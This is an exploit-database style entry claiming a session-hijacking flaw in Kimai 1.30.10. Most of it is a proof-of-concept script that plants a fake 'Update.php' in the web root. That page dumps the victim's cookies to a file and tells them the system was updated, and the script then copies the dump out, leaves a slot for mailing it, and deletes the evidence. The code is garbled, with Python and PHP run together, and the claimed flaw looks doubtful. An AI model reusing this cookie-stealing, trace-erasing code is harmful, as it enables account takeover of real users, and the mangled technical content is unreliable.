Exploits / Vulnerability Discovered : 2023-04-06 |
Type : webapps |
Platform : php
This exploit / vulnerability Kimai1.30.10 samesite cookievulnerability session hijacking is for educational purposes only and if it is used you will do on your own risk!
## Description:
The Kimai-1.30.10 is vulnerable to
SameSite-Cookie-Vulnerability-session-hijacking.
The attacker can trick the victim to update or upgrade the system, by
using a very malicious exploit to steal his vulnerable cookie and get
control of his session.
STATUS: HIGH Vulnerability
[+]Exploit:
## WARNING: The EXPLOIT IS FOR ADVANCED USERS!
This is only one example:
```python
#!/usr/bin/python
import os
import webbrowser
import time
webbrowser.open('https://pwnedhost.com/kimai-1.30.10/public/en/login')
input("After you log in please press any key to continue...")
os.system("copy Update.php
C:\\xampp\\htdocs\\pwnedhost\\kimai-1.30.10\\public\\")
time.sleep(3)
webbrowser.open('https://pwnedhost.com/kimai-1.30.10/public/Update.php')
time.sleep(3)
os.system("copy
C:\\xampp\\htdocs\\pwnedhost\\kimai-1.30.10\\public\\PoC.txt
C:\\Users\\venvaropt\\Desktop\\Kimai-1.30.10\\PoC\\")
# Your mail-sending code must be here ;)
time.sleep(7)
os.system("del C:\\xampp\\htdocs\\pwnedhost\\kimai-1.30.10\\public\\PoC.txt")
os.system("del C:\\xampp\\htdocs\\pwnedhost\\kimai-1.30.10\\public\\Update.php")
$fp = fopen('PoC.txt', 'w');
fwrite($fp, print_r($_COOKIE, TRUE));
fclose($fp);
echo "DONE: Now you are already updated! Enjoy your system Kimai
1.30.10 stable (Ayumi)";
?>
```